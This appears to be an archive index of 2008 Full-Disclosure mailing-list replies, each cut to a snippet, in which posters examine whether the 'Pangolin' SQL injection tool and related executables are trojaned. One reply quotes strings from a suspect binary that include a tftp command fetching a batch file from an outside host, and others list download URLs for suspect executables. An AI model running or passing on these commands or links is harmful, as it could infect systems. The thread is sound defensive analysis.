Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

2008-03-27 Thread Luther D. Anderson
Mike and the Twinkies, You're a genius. To the other security twinkies that are very well versed in strings analysis please get another job at the local newspaper co. So if it went clear through VirusTotal you would run it on your machines? I'd be happy to provide a DumbassTotal service for all o

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

2008-03-26 Thread Micheal Cottingham
Just some interesting strings and such: pdf_poc.exe: http://analysis.seclab.tuwien.ac.at/result.php?taskid=024c7616e34fe444398545b69c829e1d&refresh=1 ..\\..\\..\\..\\windows\\system32\\cmd.exe ..\\..\\..\\..\\windows\\system32\\tftp.exe -i zwell.3322.org a.bat Cpdf_poc.txt Cpdf_poc.txt Cpdf_poc.

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

2008-03-26 Thread Russ McRee
http://www.nosec.org/web/files/demon.exe http://www.virustotal.com/analisis/0bfb9d08a2dfe0ad413d08491d0a82a3 http://www.nosec.org/web/files/pdf_poc.exe http://www.virustotal.com/analisis/d619319b2c4a7c5bb3a81adf25bf6559 http://www.nosec.org/web/files/zps.exe http://www.virustotal.com/analisis/26d

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

2008-03-26 Thread Tim Kunschke
Ok, you are right. [EMAIL PROTECTED] ~ % wget http://www.nosec.org/web/index.txt :( --20:23:14-- http://www.nosec.org/web/index.txt => `index.txt' Auflösen des Hostnamen »

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

2008-03-26 Thread Micheal Cottingham
Not yet. C:\Users\Micheal\Research>wget http://www.nosec.org/web/index.txt --15:12:52-- http://www.nosec.org/web/index.txt => `index.txt' Resolving www.nosec.org... done. Connecting to www.nosec.org[218.92.8.74]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

2008-03-26 Thread Tim Kunschke
With firefox - URL: *http://www.nosec.org/a.exe* http://www.w3.org/TR/html4/strict.dtd";> ?? BODY { font: 9pt/12pt ?? } H1 { font: 12pt/15pt ?? } H2 { font: 9pt/12pt ?? } A:link { color: red } A:visited { color: maroon } ?? ???: ?

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

2008-03-26 Thread Ricardo Giorgi
Hi Folks, Just out of curiosity, did anyone on this list already try to reverse engineer Pangolin's code? Ricardo> Not me, although I did look at it. I thought great, kiddies are going to love this > Sent from my BlackBerry® smartphone with SprintSpeed > > -Original Messag

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

2008-03-26 Thread Micheal Cottingham
C:\Users\Micheal\Research>..\bin\upx\upx -d pangolin_bin\out\pangolin.exe Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007 UPX 3.02w Markus Oberhumer, Laszlo Molnar & John Reiser Dec 16th 2007 File size

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

2008-03-26 Thread josh
Not me, although I did look at it. I thought great, kiddies are going to love this Sent from my BlackBerry® smartphone with SprintSpeed -Original Message- From: davidrook <[EMAIL PROTECTED]> Date: Wed, 26 Mar 2008 17:23:03 To: Razi Shaban <[EMAIL PROTECTED]> Cc: full-disclosure@lists.gr